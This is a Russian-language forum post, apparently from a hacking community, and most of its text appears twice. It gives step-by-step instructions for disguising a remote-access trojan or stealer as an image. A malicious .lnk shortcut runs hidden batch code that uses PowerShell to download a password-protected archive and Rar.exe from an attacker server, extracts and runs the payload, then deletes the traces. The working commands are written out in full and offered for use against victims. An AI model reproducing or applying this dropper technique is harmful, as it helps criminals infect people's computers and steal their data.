Всех приветствую друзья, это не в коем случае не реклама стороннего ресурса но с более детальной информацией вы можете ознакомится на хабре, ссылка: https://habr.com/ru/company/group-ib/blog/493906/
В данной теме я покажу лишь как это использовать в своих целях.
Всё что нам нужно это winrar архиватор а точнее Rar.exe и наш вредоносный файл RMS или RAT или BOTNET или STEALER итд. итп. Далее, наш вредоносный файл с названием install.exe запаковываем в архив под паролем, пароль:123321, название архива на выходе install.rar, файлы Rar.exe и install.rar заливаем на свой сервер и даём обоим файлам права 777 на чтение, запись и исполнение.
С ознакомительной частью мы уже разобрались, приступим к сборке.
Маскировать будем под картинку потому создаём ярлык на раб столе и указываем в расположении:
%COMSPEC% /c "copy /Y image.lnk %temp%\1&findstr /c:"@ECHO" %temp%\1>%temp%\s.bat&start /MIN %TEMP%\s.bat&exit"
Пример:
Далее задаём имя что в расположении: image
Пример:
Далее заходим в свойства lnk файла и убираем рабочую папку и по желанию ставим любую иконку но так как мы хотим замаскировать под картинку то выбираем иконку jpg.
Пример:
Открываем image.lnk в любом редакторе текста и добавляем на следующую строку наш код на загрузку и запуск бэкдорки с сервера:
@ECHO OFF && IF EXIST "%temp%\lnkexp.txt" (exit) ELSE echo lnkexp»%temp%\lnkexp.txt && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/install.rar', '%temp%/install.rar') && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/Rar.exe', '%temp%/Rar.exe') && %temp%\Rar.exe x -t -o+ -p123321 %temp%\install.rar %temp%\ && %temp%\install.exe && del /f /q %temp%\install.rar && del /f /q %temp%\Rar.exe && exit
Пример:
Вот и всё, наш lnk готов, а всё то что далее думаю интуитивно понятно.
И если кому не сложно и тем кто с уважением относиться к моему труду, просьба подписаться на мой ютуб канал, так как первый мой канал с 2500 подписчиками и 160 роликами был заблокирован, то второй канал дал новое начало моей работе, всем спасибо кто остался со мной и спасибо тем кто оставил меня.
Ссылка на youtube канал:
Ссылка на телеграм канал:
Ссылка на мой телеграм аккаунт:
Ссылка на мой аккаунт в vk:
vk.com
По всем вопросам просьба обращаться ко мне в телеграм.
Всех с наступающим новым годом пацаны, всем добра и мира в ваш дом а так же по больше стимула достугнуть успеха во всех ваших начинаниях.
В данной теме я покажу лишь как это использовать в своих целях.
Всё что нам нужно это winrar архиватор а точнее Rar.exe и наш вредоносный файл RMS или RAT или BOTNET или STEALER итд. итп. Далее, наш вредоносный файл с названием install.exe запаковываем в архив под паролем, пароль:123321, название архива на выходе install.rar, файлы Rar.exe и install.rar заливаем на свой сервер и даём обоим файлам права 777 на чтение, запись и исполнение.
С ознакомительной частью мы уже разобрались, приступим к сборке.
Маскировать будем под картинку потому создаём ярлык на раб столе и указываем в расположении:
%COMSPEC% /c "copy /Y image.lnk %temp%\1&findstr /c:"@ECHO" %temp%\1>%temp%\s.bat&start /MIN %TEMP%\s.bat&exit"
Пример:
Далее задаём имя что в расположении: image
Пример:
Далее заходим в свойства lnk файла и убираем рабочую папку и по желанию ставим любую иконку но так как мы хотим замаскировать под картинку то выбираем иконку jpg.
Пример:
Открываем image.lnk в любом редакторе текста и добавляем на следующую строку наш код на загрузку и запуск бэкдорки с сервера:
@ECHO OFF && IF EXIST "%temp%\lnkexp.txt" (exit) ELSE echo lnkexp»%temp%\lnkexp.txt && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/install.rar', '%temp%/install.rar') && powershell -Command (new-object System.Net.WebClient).DownloadFile('http://site.ru/Rar.exe', '%temp%/Rar.exe') && %temp%\Rar.exe x -t -o+ -p123321 %temp%\install.rar %temp%\ && %temp%\install.exe && del /f /q %temp%\install.rar && del /f /q %temp%\Rar.exe && exit
Пример:
Вот и всё, наш lnk готов, а всё то что далее думаю интуитивно понятно.
И если кому не сложно и тем кто с уважением относиться к моему труду, просьба подписаться на мой ютуб канал, так как первый мой канал с 2500 подписчиками и 160 роликами был заблокирован, то второй канал дал новое начало моей работе, всем спасибо кто остался со мной и спасибо тем кто оставил меня.
Ссылка на youtube канал:
Ссылка на телеграм канал:
Ссылка на мой аккаунт в vk:
VK.com | VK
vk.com
По всем вопросам просьба обращаться ко мне в телеграм.
Всех с наступающим новым годом пацаны, всем добра и мира в ваш дом а так же по больше стимула достугнуть успеха во всех ваших начинаниях.
